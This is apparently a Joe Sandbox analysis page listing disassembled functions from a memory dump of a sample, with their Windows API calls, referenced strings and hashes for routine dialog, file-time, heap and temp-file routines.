Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aa3fdf7e2608105a27d21784ee6562e23aedc90c7d92c1c1a0dc4375bc58b16
Instruction ID: 3c565dd1802e6dd37cc3ec7e227293f9f8993ac73f583aab081abdcf98c1d9ce
Opcode Fuzzy Hash: 4aa3fdf7e2608105a27d21784ee6562e23aedc90c7d92c1c1a0dc4375bc58b16
Instruction Fuzzy Hash: C5514571A083028FC748CF19D48059AF7E1FFC8354F058A2EE899A7740DB34EA59CB96

Function 003837C1 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
Instruction ID: 2881b8454ecb74ca7124bb95c5a37e135f377c8b5e3bdaeb7c99324bf83aa8b4
Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
Instruction Fuzzy Hash: 4D31E3B16047458FCB15EF28C85226EBBE0FB95700F10892DF4A9C7742C779EA49CB92

Function 00375F3C Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c547d6dc81d248a9a4d96e85a4ea1083ba10aa9042b84b1279770cb04b7bbb6e
Instruction ID: c43ae19afd8364d13b7443a1f4c87cd780a4edc7a7126bbff273251a201b1105
Opcode Fuzzy Hash: c547d6dc81d248a9a4d96e85a4ea1083ba10aa9042b84b1279770cb04b7bbb6e
Instruction Fuzzy Hash: 0021F832A201218BCB5DCF2DDCE093A7755E786311B46C22FEA468B2D0C539E924C7A0

Function 0037DA98 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 236COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0037DABE

Part of subcall function 0037400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0037401D

Part of subcall function 00381596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,003B0EE8,00000200,0037D202,00000000,?,00000050,003B0EE8), ref: 003815B3

_strlen.LIBCMT ref: 0037DADF
SetDlgItemTextW.USER32(?,003AE154,?), ref: 0037DB3F
GetWindowRect.USER32(?,?), ref: 0037DB79
GetClientRect.USER32(?,?), ref: 0037DB85
GetWindowLongW.USER32(?,000000F0), ref: 0037DC25
GetWindowRect.USER32(?,?), ref: 0037DC52
SetWindowTextW.USER32(?,?), ref: 0037DC95
GetSystemMetrics.USER32(00000008), ref: 0037DC9D
GetWindow.USER32(?,00000005), ref: 0037DCA8
GetWindowRect.USER32(00000000,?), ref: 0037DCD5
GetWindow.USER32(00000000,00000002), ref: 0037DD47

Strings

$%s:, xrefs: 0037DAB2
CAPTION, xrefs: 0037DC77
d, xrefs: 0037DBA5
T:, xrefs: 0037DAFA

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$T:$d
API String ID: 2407758923-4012312144
Opcode ID: 1505eadeb4377d8dd9f1b19e0fec7c2d804388dff8ab3e2377537612de3d9efe
Instruction ID: 931987d8252c722aad6ef0cf461d9fcff52ff4091497407b92aa4f53e89ab007
Opcode Fuzzy Hash: 1505eadeb4377d8dd9f1b19e0fec7c2d804388dff8ab3e2377537612de3d9efe
Instruction Fuzzy Hash: 4081C071508301AFD722DF68DC88E6BBBF9EF89704F05891DFA8997250D674E805CB52

Function 0039C233 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0039C277

Part of subcall function 0039BE12: _free.LIBCMT ref: 0039BE2F
Part of subcall function 0039BE12: _free.LIBCMT ref: 0039BE41
Part of subcall function 0039BE12: _free.LIBCMT ref: 0039BE53
Part of subcall function 0039BE12: _free.LIBCMT ref: 0039BE65
Part of subcall function 0039BE12: _free.LIBCMT ref: 0039BE77
Part of subcall function 0039BE12: _free.LIBCMT ref: 0039BE89
Part of subcall function 0039BE12: _free.LIBCMT ref: 0039BE9B
Part of subcall function 0039BE12: _free.LIBCMT ref: 0039BEAD
Part of subcall function 0039BE12: _free.LIBCMT ref: 0039BEBF
Part of subcall function 0039BE12: _free.LIBCMT ref: 0039BED1
Part of subcall function 0039BE12: _free.LIBCMT ref: 0039BEE3
Part of subcall function 0039BE12: _free.LIBCMT ref: 0039BEF5
Part of subcall function 0039BE12: _free.LIBCMT ref: 0039BF07

_free.LIBCMT ref: 0039C26C

Part of subcall function 003984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0039BFA7,003A3958,00000000,003A3958,00000000,?,0039BFCE,003A3958,00000007,003A3958,?,0039C3CB,003A3958), ref: 003984F4
Part of subcall function 003984DE: GetLastError.KERNEL32(003A3958,?,0039BFA7,003A3958,00000000,003A3958,00000000,?,0039BFCE,003A3958,00000007,003A3958,?,0039C3CB,003A3958,003A3958), ref: 00398506

_free.LIBCMT ref: 0039C28E
_free.LIBCMT ref: 0039C2A3
_free.LIBCMT ref: 0039C2AE
_free.LIBCMT ref: 0039C2D0
_free.LIBCMT ref: 0039C2E3
_free.LIBCMT ref: 0039C2F1
_free.LIBCMT ref: 0039C2FC
_free.LIBCMT ref: 0039C334
_free.LIBCMT ref: 0039C33B
_free.LIBCMT ref: 0039C358
_free.LIBCMT ref: 0039C370

Strings

P:, xrefs: 0039C249

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: P:
API String ID: 161543041-692640210
Opcode ID: c1c4543c08a9a93f07272f0073cf4eb2cfd8fcb30587d4be78ba854d4b1cd9c5
Instruction ID: 830359eb8ad7f06fdf9dd557ceb6c721f1019abe7c862d21b23dadd3cbb0260e
Opcode Fuzzy Hash: c1c4543c08a9a93f07272f0073cf4eb2cfd8fcb30587d4be78ba854d4b1cd9c5
Instruction Fuzzy Hash: 4C318D326002069FEF22AB79D945B5BB3E9FF42310F129829E489DB551DF35FC409B20

Function 0038CD2E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 0038CD51
GetClassNameW.USER32(00000000,?,00000800), ref: 0038CD7D

Part of subcall function 003817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0037BB05,00000000,.exe,?,?,00000800,?,?,003885DF,?), ref: 003817C2

GetWindowLongW.USER32(00000000,000000F0), ref: 0038CD99
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0038CDB0
GetObjectW.GDI32(00000000,00000018,?), ref: 0038CDC4
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0038CDED
DeleteObject.GDI32(00000000), ref: 0038CDF4
GetWindow.USER32(00000000,00000002), ref: 0038CDFD

Strings

STATIC, xrefs: 0038CD83

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: 2a008286836992041dd9820240c541b349824668a266f4e2d9073cdcde487d52
Instruction ID: b54f77fcdca19551367631f01b2b56c775a2c8a47013be90d070003706b84dfa
Opcode Fuzzy Hash: 2a008286836992041dd9820240c541b349824668a266f4e2d9073cdcde487d52
Instruction Fuzzy Hash: 5F1106325513117BE3237B70AC0AFAF775CEF65742F018462FA42A50A2DA74890A97B4

Function 00398EB1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00398EC5

Part of subcall function 003984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0039BFA7,003A3958,00000000,003A3958,00000000,?,0039BFCE,003A3958,00000007,003A3958,?,0039C3CB,003A3958), ref: 003984F4
Part of subcall function 003984DE: GetLastError.KERNEL32(003A3958,?,0039BFA7,003A3958,00000000,003A3958,00000000,?,0039BFCE,003A3958,00000007,003A3958,?,0039C3CB,003A3958,003A3958), ref: 00398506

_free.LIBCMT ref: 00398ED1
_free.LIBCMT ref: 00398EDC
_free.LIBCMT ref: 00398EE7
_free.LIBCMT ref: 00398EF2
_free.LIBCMT ref: 00398EFD
_free.LIBCMT ref: 00398F08
_free.LIBCMT ref: 00398F13
_free.LIBCMT ref: 00398F1E
_free.LIBCMT ref: 00398F2C

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 55f21199946d430016bef69a4b829801a4a6df29e364741c5100d6151c0d7b1d
Instruction ID: c51a49f2ac989b66fb73efdbc633ec68ceeee643d2d010909bd09f9d2b068ec3
Opcode Fuzzy Hash: 55f21199946d430016bef69a4b829801a4a6df29e364741c5100d6151c0d7b1d
Instruction Fuzzy Hash: B211B37650010DBFCF12EF95C842CDA3BA5FF86354B5281A5FA088F626DA31EE51DB80

Function 00372162 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON

Download Yara Rule

Strings

;%u, xrefs: 00372497
xc%u, xrefs: 003726D7
x%u, xrefs: 0037267A

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID:
String ID: ;%u$x%u$xc%u
API String ID: 0-2277559157
Opcode ID: 7c587d795378e157b1181250b5e6d695fa8e54ae0843f6368fb4c2b850622a61
Instruction ID: eea368a0de2753c9d8907a7e26a4aa0020264319a4d1e00941373c7d95aea1ea
Opcode Fuzzy Hash: 7c587d795378e157b1181250b5e6d695fa8e54ae0843f6368fb4c2b850622a61
Instruction Fuzzy Hash: B9F106716042805BDB3BEE2489D5BEB77D96B91300F08C56DF88D9F283DA6C9948C762

Function 0038ACD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0037130B: GetDlgItem.USER32(00000000,00003021), ref: 0037134F
Part of subcall function 0037130B: SetWindowTextW.USER32(00000000,003A35B4), ref: 00371365

EndDialog.USER32(?,00000001), ref: 0038AD20
SendMessageW.USER32(?,00000080,00000001,?), ref: 0038AD47
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0038AD60
SetWindowTextW.USER32(?,?), ref: 0038AD71
GetDlgItem.USER32(?,00000065), ref: 0038AD7A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0038AD8E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0038ADA4

Strings

LICENSEDLG, xrefs: 0038ACE4

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: 9354803de2174380cc54d2ad85a4a93f12bf81be8538eb0c81493c9e0511ce20
Instruction ID: 68e726597613145fba31c6b8b47872de1fc16a6f1e67d8fa6875129c4334c61a
Opcode Fuzzy Hash: 9354803de2174380cc54d2ad85a4a93f12bf81be8538eb0c81493c9e0511ce20
Instruction Fuzzy Hash: 4E21E732241705BBE6236F31EC49F3B3B6CEB5A746F024046F604D64A0DB626904D732

Function 00379443 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00379448
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0037946B
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0037948A

Part of subcall function 003817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0037BB05,00000000,.exe,?,?,00000800,?,?,003885DF,?), ref: 003817C2

_swprintf.LIBCMT ref: 00379526

Part of subcall function 0037400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0037401D

MoveFileW.KERNEL32(?,?), ref: 00379595
MoveFileW.KERNEL32(?,?), ref: 003795D5

Strings

rtmp%d, xrefs: 0037950F

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
String ID: rtmp%d
API String ID: 2111052971-3303766350
Opcode ID: 1189bfd0e2a1b4f5305224798408845d0e4ec891d90ce6deaf89b945317bdf52
Instruction ID: 7fd96a90cf09fd6e1465d17167e82cbd148fa720984efb4d655dc35e8b9e49c4
Opcode Fuzzy Hash: 1189bfd0e2a1b4f5305224798408845d0e4ec891d90ce6deaf89b945317bdf52
Instruction Fuzzy Hash: 61415F71900259A6CF32EB648C85FEE737CAF51390F0586E6B54DE7041EB788B89DB60

Function 00388E62 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 125memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 00388F38
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00388F59
CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00388F80

Strings

</html>, xrefs: 00388F0A
utf-8"></head>, xrefs: 00388EBD
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00388EB2
<html>, xrefs: 00388EA7, 00388EE0

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: Global$AllocByteCharCreateMultiStreamWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 4094277203-4209811716
Opcode ID: 5de0c772c352e69bed24e2602675943b12bfb16996cdac4d6a5222ded7b69165
Instruction ID: fece0d7e642dfd42219aceac83e09d58885205a9643d8872f3a3be26337c4e8d
Opcode Fuzzy Hash: 5de0c772c352e69bed24e2602675943b12bfb16996cdac4d6a5222ded7b69165
Instruction Fuzzy Hash: 56314A325083117BDB27BB34AC02FAF7B6CDF86724F51055AF9019A1C1EF749A0983A5

Function 00398FA5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,003B0EE8,00393E14,003B0EE8,?,?,00393713,00000050,?,003B0EE8,00000200), ref: 00398FA9
_free.LIBCMT ref: 00398FDC
_free.LIBCMT ref: 00399004
SetLastError.KERNEL32(00000000,?,003B0EE8,00000200), ref: 00399011
SetLastError.KERNEL32(00000000,?,003B0EE8,00000200), ref: 0039901D
_abort.LIBCMT ref: 00399023

Strings

X:, xrefs: 00398FF7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID: X:
API String ID: 3160817290-423137811
Opcode ID: 0de736e20c78644e932a23fedd80f41bdb2364f18b5793abd8a79f048ce786b7
Instruction ID: ef7daabd51689d3613b7b573752642c1f1ab17e011ad1daa5ce275989cb64a2a
Opcode Fuzzy Hash: 0de736e20c78644e932a23fedd80f41bdb2364f18b5793abd8a79f048ce786b7
Instruction Fuzzy Hash: 4BF02836504A006BCE2377287C0AB6B292E9FC3760F270119F417D72A2EF21C9015050

Function 00380A8A Relevance: 12.1, APIs: 8, Instructions: 115timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00380A9D

Part of subcall function 0037ACF5: GetVersionExW.KERNEL32(?), ref: 0037AD1A

FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00380AC0
FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00380AD2
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00380AE3
SystemTimeToFileTime.KERNEL32(?,?), ref: 00380AF3
SystemTimeToFileTime.KERNEL32(?,?), ref: 00380B03
FileTimeToSystemTime.KERNEL32(?,?), ref: 00380B3D
__aullrem.LIBCMT ref: 00380BCB

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: 1c31b43ad60ad2b48ca26cabac6aa679c539ddb14b23825d37da1991935590fc
Instruction ID: 8ddfb0ff278780043fc39fc0fc093c21ed731ada25e1968b5ffcb51d57891da1
Opcode Fuzzy Hash: 1c31b43ad60ad2b48ca26cabac6aa679c539ddb14b23825d37da1991935590fc
Instruction Fuzzy Hash: A44128B1408306AFC355EF65C8809ABFBF8FF88714F004A2EF59692650E778E548CB52

Function 0039EE2D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0039F5A2,?,00000000,?,00000000,00000000), ref: 0039EE6F
__fassign.LIBCMT ref: 0039EEEA
__fassign.LIBCMT ref: 0039EF05
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0039EF2B
WriteFile.KERNEL32(?,?,00000000,0039F5A2,00000000,?,?,?,?,?,?,?,?,?,0039F5A2,?), ref: 0039EF4A
WriteFile.KERNEL32(?,?,00000001,0039F5A2,00000000,?,?,?,?,?,?,?,?,?,0039F5A2,?), ref: 0039EF83

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 28ba54e7ae805589846d885f8642dadbb4ad68b8838c3bdec1185d260f8d28ef
Instruction ID: 22fe768178572eb4057a574b4230b84e78ffc6e8651acd5cb6fa29c375fa716b
Opcode Fuzzy Hash: 28ba54e7ae805589846d885f8642dadbb4ad68b8838c3bdec1185d260f8d28ef
Instruction Fuzzy Hash: 4C51B3B1A00209AFDF12CFA8D845AEEBBF9EF09310F15451BE556E7291D7319940CB60

Function 0038C534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 0038C54A
_swprintf.LIBCMT ref: 0038C57E

Part of subcall function 0037400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0037401D

SetDlgItemTextW.USER32(?,00000066,003B946A), ref: 0038C59E
_wcschr.LIBVCRUNTIME ref: 0038C5D1
EndDialog.USER32(?,00000001), ref: 0038C6B2

Strings

%s%s%u, xrefs: 0038C573

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
